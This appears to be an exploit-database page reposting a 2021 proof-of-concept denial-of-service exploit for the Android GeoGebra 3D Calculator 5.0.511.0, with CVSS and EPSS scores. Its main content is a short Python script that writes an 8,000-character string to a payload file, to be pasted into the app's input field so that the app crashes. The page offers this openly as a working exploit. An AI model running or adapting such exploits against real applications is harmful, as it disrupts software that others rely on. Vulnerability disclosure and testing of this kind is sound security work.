Advertisement






GeoGebra 3D Calculator 5.0.511.0 Denial of Service (PoC)

CVE Category Price Severity
N/A CWE-400 N/A N/A
Author Risk Exploitation Type Date
N/A N/A N/A 2021-03-16
CPE
cpe:cpe:/a:geogebra:3d_calculator:5.0.511
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 0.185202 0.83185

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2021030085

Below is a copy:

GeoGebra 3D Calculator 5.0.511.0 Denial of Service (PoC)
# Exploit Title: GeoGebra 3D Calculator 5.0.511.0 - Denial of Service (PoC)
# Date: 2021-03-15
# Author: Brian Rodrguez
# Software Site: https://www.geogebra.org/download
# Download Link: https://play.google.com/store/apps/details?id=org.geogebra.android.g3d&utm_source=Download+page&utm_medium=Website&utm_campaign=3D+Calculator+for+Android
# Version: 5.0.511.0
# Category: DoS (Android)

##### Vulnerability #####

Graficador GeoGebra 3D is vulnerable to a DoS condition when a long list of characters is being used in field "Entrada..." text box.

Successful exploitation will causes application stop working.

I have been able to test this exploit against Android 10.0.

##### PoC #####

#!/usr/bin/env python
buffer = "\x41" * 8000

try:
    f = open("payload.txt","w")
    f.write(buffer)
    f.close()
    print ("File created")
except:
    print ("File cannot be created")

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum